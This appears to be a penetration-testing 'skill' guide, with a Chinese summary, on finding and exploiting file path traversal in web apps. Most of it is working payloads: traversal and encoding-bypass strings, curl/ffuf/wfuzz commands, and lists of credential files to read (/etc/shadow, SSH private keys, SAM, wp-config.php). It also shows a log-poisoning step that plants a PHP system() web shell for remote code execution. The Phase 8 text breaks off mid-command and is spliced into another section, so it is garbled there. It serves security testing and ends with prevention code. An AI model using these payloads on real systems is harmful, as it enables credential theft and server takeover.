以下为本文档的中文说明

file-path-traversal-testing 是一个专注于文件路径遍历(目录遍历)漏洞测试的安全技能,用于检测和利用 Web 应用中的路径遍历漏洞。该漏洞允许攻击者读取服务器上的任意文件,包括敏感配置文件、凭证文件和源代码,通常发生在用户可控的输入被直接传递给文件系统 API 而未经过正确验证的情况下。该技能提供了完整的测试方法论和工具链。前置条件包括:掌握 HTTP 请求/响应结构、了解 Linux 和 Windows 文件系统布局、理解 Web 应用架构、以及具备文件 API 的基础知识。推荐的工具包括:带开发者工具的 Web 浏览器、Burp Suite 或 OWASP ZAP 等拦截代理、cURL 用于手动测试负载、以及 ffuf 或 wfuzz 用于模糊测试。使用场景包括:Web 应用安全审计、渗透测试中的信息收集阶段、安全开发生命周期(SDL)中的代码审查、以及 CTF 安全竞赛。测试产出物包括:漏洞报告,记录发现的所有遍历点和可访问的文件;利用验证,确认关键文件的可读性(如 /etc/passwd、web.config 等);以及修复建议,提供针对不同编程语言和框架的防御方案。核心测试方法包括:使用 …/ 序列进行目录回溯、URL 编码绕过、双编码绕过、以及使用绝对路径直接访问。该技能还提供了多种防御策略的参考,如输入验证白名单、规范化路径解析和最小权限原则。


File Path Traversal Testing

Purpose

Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.

Prerequisites

Required Tools

  • Web browser with developer tools
  • Burp Suite or OWASP ZAP
  • cURL for testing payloads
  • Wordlists for automation
  • ffuf or wfuzz for fuzzing

Required Knowledge

  • HTTP request/response structure
  • Linux and Windows filesystem layout
  • Web application architecture
  • Basic understanding of file APIs

Outputs and Deliverables

  1. Vulnerability Report - Identified traversal points and severity
  2. Exploitation Proof - Extracted file contents
  3. Impact Assessment - Accessible files and data exposure
  4. Remediation Guidance - Secure coding recommendations

Core Workflow

Phase 1: Understanding Path Traversal

Path traversal occurs when applications use user input to construct file paths:

// Vulnerable PHP code example
$template = "blue.php";
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
    $template = $_COOKIE['template'];
}
include("/home/user/templates/" . $template);

Attack principle:

  • ../ sequence moves up one directory
  • Chain multiple sequences to reach root
  • Access files outside intended directory

Impact:

  • Confidentiality - Read sensitive files
  • Integrity - Write/modify files (in some cases)
  • Availability - Delete files (in some cases)
  • Code Execution - If combined with file upload or log poisoning

Phase 2: Identifying Traversal Points

Map application for potential file operations:

# Parameters that often handle files
?file=
?path=
?page=
?template=
?filename=
?doc=
?document=
?folder=
?dir=
?include=
?src=
?source=
?content=
?view=
?download=
?load=
?read=
?retrieve=

Common vulnerable functionality:

  • Image loading: /image?filename=23.jpg
  • Template selection: ?template=blue.php
  • File downloads: /download?file=report.pdf
  • Document viewers: /view?doc=manual.pdf
  • Include mechanisms: ?page=about

Phase 3: Basic Exploitation Techniques

Simple Path Traversal
# Basic Linux traversal
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd

# Windows traversal
..\\..\\..\\windows\\win.ini
..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts

# URL encoded
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd  # Double encoding

# Test payloads with curl
curl "http://target.com/image?filename=../../../etc/passwd"
curl "http://target.com/download?file=....//....//....//etc/passwd"
Absolute Path Injection
# Direct absolute path (Linux)
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ

# Direct absolute path (Windows)
C:\\windows\\win.ini
C:\\windows\\system32\\drivers\\etc\\hosts
C:\\boot.ini

Phase 4: Bypass Techniques

Bypass Stripped Traversal Sequences
# When ../ is stripped once
....//....//....//etc/passwd
....\/....\/....\/etc/passwd

# Nested traversal
..././..././..././etc/passwd
....//....//etc/passwd

# Mixed encoding
..%2f..%2f..%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
Bypass Extension Validation
# Null byte injection (older PHP versions)
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png

# Path truncation
../../../etc/passwd...............................

# Double extension
../../../etc/passwd.jpg.php
Bypass Base Directory Validation
# When path must start with expected directory
/var/www/images/../../../etc/passwd

# Expected path followed by traversal
images/../../../etc/passwd
Bypass Blacklist Filters
# Unicode/UTF-8 encoding
..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/passwd

# Overlong UTF-8 encoding
%c0%2e%c0%2e%c0%af

# URL encoding variations
%2e%2e/
%2e%2e%5
c
..%5c
..%255c

# Case variations (Windows)
....\\\\....\\\\etc\\\\passwd

Phase 5: Linux Target Files

High-value files to target:

# System files
/etc/passwd           # User accounts
/etc/shadow           # Password hashes (root only)
/etc/group            # Group information
/etc/hosts            # Host mappings
/etc/hostname         # System hostname
/etc/issue            # System banner

# SSH files
/root/.ssh/id_rsa           # Root private key
/root/.ssh/authorized_keys  # Authorized keys
/home/<user>/.ssh/id_rsa    # User private keys
/etc/ssh/sshd_config        # SSH configuration

# Web server files
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/apache2/sites-enabled/000-default.conf
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log

# Application files
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.htaccess
/var/www/html/web.config

# Process information
/proc/self/environ      # Environment variables
/proc/self/cmdline      # Process command line
/proc/self/fd/0         # File descriptors
/proc/version           # Kernel version

# Common application configs
/etc/mysql/my.cnf
/etc/postgresql/*/postgresql.conf
/opt/lampp/etc/httpd.conf

Phase 6: Windows Target Files

Windows-specific targets:

# System files
C:\\windows\\win.ini
C:\\windows\\system.ini
C:\\boot.ini
C:\\windows\\system32\\drivers\\etc\\hosts
C:\\windows\\system32\\config\\SAM
C:\\windows\\repair\\SAM

# IIS files
C:\\inetpub\\wwwroot\\web.config
C:\\inetpub\\logs\\LogFiles\\W3SVC1\\

# Configuration files
C:\\xampp\\apache\\conf\\httpd.conf
C:\\xampp\\mysql\\data\\mysql\\user.MYD
C:\\xampp\\passwords.txt
C:\\xampp\\phpmyadmin\\config.inc.php

# User files
C:\\Users\\<user>\\.ssh\\id_rsa
C:\\Users\\<user>\\Desktop\\
C:\\Documents and Settings\\<user>\\

Phase 7: Automated Testing

Using Burp Suite
1. Capture request with file parameter
2. Send to Intruder
3. Mark file parameter value as payload position
4. Load path traversal wordlist
5. Start attack
6. Filter responses by size/content for success
Using ffuf
# Basic traversal fuzzing
ffuf -u "http://target.com/image?filename=FUZZ" \\
     -w /usr/share/wordlists/traversal.txt \\
     -mc 200

# Fuzzing with encoding
ffuf -u "http://target.com/page?file=FUZZ" \\
     -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \\
     -mc 200,500 -ac
Using wfuzz
# Traverse to /etc/passwd
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \\
      --hc 404 \\
      "http://target.com/index.php?file=FUZZ"

# With headers/cookies
wfuzz -c -z file,traversal.txt \\
      -H "Cookie: session=abc123" \\
      "http://target.com/load?path=FUZZ"

Phase 8: LFI to RCE Escalation

Log Poisoning
# Inject PHP code into logs
curl -A "<?php system(\\$_GET['cmd']); ?>" http://target.com/

# Include Apache log file
curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"

# Include auth.log (SSH)
# First: ssh '<?php system($_GET["cmd\
est basic traversal
../../../etc/passwd

# Step 3: Test encoding variations
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

# Step 4: Test bypass techniques
....//....//....//etc/passwd
..;/..;/..;/etc/passwd

# Step 5: Test absolute paths
/etc/passwd

# Step 6: Test with null bytes (legacy)
../../../etc/passwd%00.jpg

# Step 7: Attempt wrapper exploitation
php://filter/convert.base64-encode/resource=index.php

# Step 8: Attempt log poisoning for RCE

Phase 10: Prevention Measures

Secure coding practices:

// PHP: Use basename() to strip paths
$filename = basename($_GET['file']);
$path = "/var/www/files/" . $filename;

// PHP: Validate against whitelist
$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
if (in_array($_GET['file'], $allowed)) {
    include("/var/www/files/" . $_GET['file']);
}

// PHP: Canonicalize and verify base path
$base = "/var/www/files/";
$realBase = realpath($base);
$userPath = $base . $_GET['file'];
$realUserPath = realpath($userPath);

if ($realUserPath && strpos($realUserPath, $realBase) === 0) {
    include($realUserPath);
}
# Python: Use os.path.realpath() and validate
import os

def safe_file_access(base_dir, filename):
    # Resolve to absolute path
    base = os.path.realpath(base_dir)
    file_path = os.path.realpath(os.path.join(base, filename))
    
    # Verify file is within base directory
    if file_path.startswith(base):
        return open(file_path, 'r').read()
    else:
        raise Exception("Access denied")

Quick Reference

Common Payloads

Payload Target
../../../etc/passwd Linux password file
..\\..\\..\\..\\windows\\win.ini Windows INI file
....//....//....//etc/passwd Bypass simple filter
/etc/passwd Absolute path
php://filter/convert.base64-encode/resource=config.php Source code

Target Files

OS File Purpose
Linux /etc/passwd User accounts
Linux /etc/shadow Password hashes
Linux /proc/self/environ Environment vars
Windows C:\\windows\\win.ini System config
Windows C:\\boot.ini Boot config
Web wp-config.php WordPress DB creds

Encoding Variants

Type Example
URL Encoding %2e%2e%2f = ../
Double Encoding %252e%252e%252f = ../
Unicode %c0%af = /
Null Byte %00

Constraints and Limitations

Permission Restrictions

  • Cannot read files application user cannot access
  • Shadow file requires root privileges
  • Many files have restrictive permissions

Application Restrictions

  • Extension validation may limit file types
  • Base path validation may restrict scope
  • WAF may block common payloads

Testing Considerations

  • Respect authorized scope
  • Avoid accessing genuinely sensitive data
  • Document all successful access

Troubleshooting

Problem Solutions
No response difference Try encoding, blind traversal, different files
Payload blocked Use encoding variants, nested sequences, case variations
Cannot escalate to RCE Check logs, PHP wrappers, file upload, session poisoning
Logo

openEuler 是由开放原子开源基金会孵化的全场景开源操作系统项目,面向数字基础设施四大核心场景(服务器、云计算、边缘计算、嵌入式),全面支持 ARM、x86、RISC-V、loongArch、PowerPC、SW-64 等多样性计算架构

更多推荐